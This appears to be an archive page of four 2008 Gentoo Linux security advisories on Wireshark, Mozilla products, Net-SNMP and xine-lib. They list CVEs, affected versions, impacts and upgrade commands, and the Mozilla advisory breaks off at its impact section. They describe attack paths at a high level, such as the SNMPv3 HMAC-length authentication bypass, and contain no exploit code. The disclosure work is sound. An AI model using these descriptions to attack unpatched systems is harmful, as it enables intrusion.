- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Wireshark: Denial of Service Date: August 06, 2008 Bugs: #230411, #231587 ID: 200808-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple Denial of Service vulnerabilities have been discovered in Wireshark. Background == Wireshark is a network protocol analyzer with a graphical front-end. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-analyzer/wireshark < 1.0.2 >= 1.0.2 Description === Multiple vulnerabilities related to memory management were discovered in the GSM SMS dissector (CVE-2008-3137), the PANA and KISMET dissectors (CVE-2008-3138), the RTMPT dissector (CVE-2008-3139), the syslog dissector (CVE-2008-3140) and the RMI dissector (CVE-2008-3141) and when reassembling fragmented packets (CVE-2008-3145). Impact == A remote attacker could exploit these vulnerabilities by sending a specially crafted packet on a network being monitored by Wireshark or enticing a user to read a malformed packet trace file, causing a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All Wireshark users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.0.2" References == [ 1 ] CVE-2008-3137 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3137 [ 2 ] CVE-2008-3138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3138 [ 3 ] CVE-2008-3139 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3139 [ 4 ] CVE-2008-3140 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3140 [ 5 ] CVE-2008-3141 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3141 [ 6 ] CVE-2008-3145 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3145 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-04.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[ GLSA 200808-03 ] Mozilla products: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla products: Multiple vulnerabilities Date: August 06, 2008 Bugs: #204337, #218065, #230567, #231975 ID: 200808-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been reported in Mozilla Firefox, Thunderbird, SeaMonkey and XULRunner, some of which may allow user-assisted execution of arbitrary code. Background == Mozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the 'Mozilla Application Suite'. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications like Firefox and Thunderbird. Affected packages = --- Package / Vulnerable / Unaffected --- 1 mozilla-firefox < 2.0.0.16>= 2.0.0.16 2 mozilla-firefox-bin < 2.0.0.16>= 2.0.0.16 3 mozilla-thunderbird < 2.0.0.16>= 2.0.0.16 4 mozilla-thunderbird-bin < 2.0.0.16>= 2.0.0.16 5 seamonkey< 1.1.11 >= 1.1.11 6 seamonkey-bin< 1.1.11 >= 1.1.11 7 xulrunner < 1.8.1.16>= 1.8.1.16 8 xulrunner-bin < 1.8.1.16>= 1.8.1.16 --- 8 affected packages on all of their supported architectures. --- Description === The following vulnerabilities were reported in all mentioned Mozilla products: * TippingPoint's Zero Day Initiative reported that an incorrect integer data type is used as a CSS object reference counter, leading to a counter overflow and a free() of in-use memory (CVE-2008-2785). * Igor Bukanov, Jesse Ruderman and Gary Kwong reported crashes in the JavaScript engine, possibly triggering memory corruption (CVE-2008-2799). * Devon Hubbard, Jesse Ruderman, and Martijn Wargers reported crashes in the layout engine, possibly triggering memory corruption (CVE-2008-2798). * moz_bug_r_a4 reported that XUL documents that include a script from a chrome: URI that points to a fastload file would be executed with the privileges specified in the file (CVE-2008-2802). * moz_bug_r_a4 reported that the mozIJSSubScriptLoader.LoadScript() function only apply XPCNativeWrappers to scripts loaded from standard "chrome:" URIs, which could be the case in third-party add-ons (CVE-2008-2803). * Astabis reported a crash in the block reflow implementation related to large images (CVE-2008-2811). * John G. Myers, Frank Benkstein and Nils Toedtmann reported a weakness in the trust model used by Mozilla, that when a user accepts an SSL server certificate on the basis of the CN domain name in the DN field, the certificate is also regarded as accepted for all domain names in subjectAltName:dNSName fields (CVE-2008-2809). The following vulnerabilities were reported in Firefox, SeaMonkey and XULRunner: * moz_bug_r_a4 reported that the Same Origin Policy is not properly enforced on JavaScript (CVE-2008-2800). * Collin Jackson and Adam Barth reported that JAR signing is not properly implemented, allowing injection of JavaScript into documents within a JAR archive (CVE-2008-2801). * Opera Software reported an error allowing for arbitrary local file upload (CVE-2008-2805). * Daniel Glazman reported that an invalid .properties file for an add-on might lead to the usage of uninitialized memory (CVE-2008-2807). * Masahiro Yamada reported that HTML in "file://" URLs in directory listings is not properly escaped (CVE-2008-2808). * Geoff reported that the context of Windows Internet shortcut files is not correctly identified (CVE-2008-2810). * The crash vulnerability (CVE-2008-1380) that was previously announced in GLSA 200805-18 is now also also resolved in Seamonkey binary ebuilds. The following vulnerability was reported in Firefox only: * Billy Rios reported that the Pipe character in a command-line URI is identified as a request to open multiple tabs, allowing to open "chrome" and "file" URIs (CVE-2008-2933). Impact ===
[ GLSA 200808-02 ] Net-SNMP: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Net-SNMP: Multiple vulnerabilities Date: August 06, 2008 Bugs: #65, #225105 ID: 200808-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in Net-SNMP allow for authentication bypass in snmpd and execution of arbitrary code in Perl applications using Net-SMNP. Background == Net-SNMP is a collection of tools for generating and retrieving SNMP data. The SNMPv3 protocol uses a keyed-Hash Message Authentication Code (HMAC) to verify data integrity and authenticity of SNMP messages. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-analyzer/net-snmp < 5.4.1.1 >= 5.4.1.1 Description === Wes Hardaker reported that the SNMPv3 HMAC verification relies on the client to specify the HMAC length (CVE-2008-0960). John Kortink reported a buffer overflow in the Perl bindings of Net-SNMP when processing the OCTETSTRING in an attribute value pair (AVP) received by an SNMP agent (CVE-2008-2292). Impact == An attacker could send SNMPv3 packets to an instance of snmpd providing a valid user name and an HMAC length value of 1, and easily conduct brute-force attacks to bypass SNMP authentication. An attacker could further entice a user to connect to a malicious SNMP agent with an SNMP client using the Perl bindings, possibly resulting in the execution of arbitrary code. Workaround == There is no known workaround at this time. Resolution == All Net-SNMP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/net-snmp-5.4.1.1" References == [ 1 ] CVE-2008-0960 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960 [ 2 ] CVE-2008-2292 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2292 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-02.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[ GLSA 200808-01 ] xine-lib: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: xine-lib: User-assisted execution of arbitrary code Date: August 06, 2008 Bugs: #213039, #214270, #218059 ID: 200808-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis xine-lib is vulnerable to multiple buffer overflows when processing media streams. Background == xine-lib is the core library package for the xine media player, and other players such as Amarok, Codeine/Dragon Player and Kaffeine. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-libs/xine-lib < 1.1.13 >= 1.1.13 Description === Multiple vulnerabilities have been discovered in xine-lib: * Alin Rad Pop of Secunia reported an array indexing vulnerability in the sdpplin_parse() function in the file input/libreal/sdpplin.c when processing streams from RTSP servers that contain a large "streamid" SDP parameter (CVE-2008-0073). * Luigi Auriemma reported multiple integer overflows that result in heap-based buffer overflows when processing ".FLV", ".MOV" ".RM", ".MVE", ".MKV", and ".CAK" files (CVE-2008-1482). * Guido Landi reported a stack-based buffer overflow in the demux_nsf_send_chunk() function when handling titles within NES Music (.NSF) files (CVE-2008-1878). Impact == A remote attacker could entice a user to play a specially crafted video file or stream with a player using xine-lib, potentially resulting in the execution of arbitrary code with the privileges of the user running the player. Workaround == There is no known workaround at this time. Resolution == All xine-lib users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/xine-lib-1.1.13" References == [ 1 ] CVE-2008-0073 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0073 [ 2 ] CVE-2008-1482 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1482 [ 3 ] CVE-2008-1878 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1878 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-01.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.